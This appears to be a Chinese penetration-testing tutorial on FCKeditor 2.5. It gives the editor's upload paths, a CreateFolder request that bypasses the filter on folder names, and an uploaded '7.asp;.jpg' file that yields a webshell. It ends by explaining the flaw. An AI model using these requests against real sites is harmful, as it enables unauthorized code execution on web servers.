## FCKeditor编辑器： --- > 🚗可以去这下载编辑器:http://download.csdn.net/detail/u011781521/9767326 ### 该编辑器基础 1. 查看编辑器版本 路径：FCKeditor/\_whatsnew.html 2. FCKeditor编辑器页 路径：FCKeditor/\_samples/default.html 3. 常用上传地址 ```url FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp ``` 由于这里用的是2.5的版本所以下面这条语句能用 > http://192.168.60.102:99/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp 如果在输入以上地址测试的过程中弹出提示‘’‘this connector is disabled,please check the xxx file ’, 那就是没有开启文件上传功能,需要开启 ``` # 文件路径 \editor\filemanager\connectors\asp\config.asp #参数 Dim ConfigIsEnabled ConfigIsEnabled = False ``` ### FCKeditor漏洞利用方法→文件上传漏洞 先来到前文所指的后台页面 #### 漏洞利用 1. 新建文件夹captain.asp 被系统改为captain_asp，这就是fckeditor过滤"."为"\_"的一个机制, 2. 想要突破的话采用绝对路径的方式创建文件夹，直接绕过函数。 执行以下地址就能成功创建文件夹 ``` /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=xx.asp ``` 3. 然后我们再上传`7.asp;.jpg`到`fendo7777.asp`文件下看是否成功解析 4. 上传成功后，访问该文件，默认文件路径如下，已经成功获取webshell `http://x.x.x.x/userfiles/image/fendo7777.asp;.jpg` #### 漏洞原因 为什么手动不能创建，而通过以上地址就能成功创建了，对比下手动创建和通过以上地址创建的一个区别。 ``` #漏洞地址： /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=x.asp #手工新建： /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=captain.asp ``` **原因：** CurrentFolder：当前文件夹 未进行过滤(这个文件夹下的没有过滤) NewFolderName：新建文件名 进行了过滤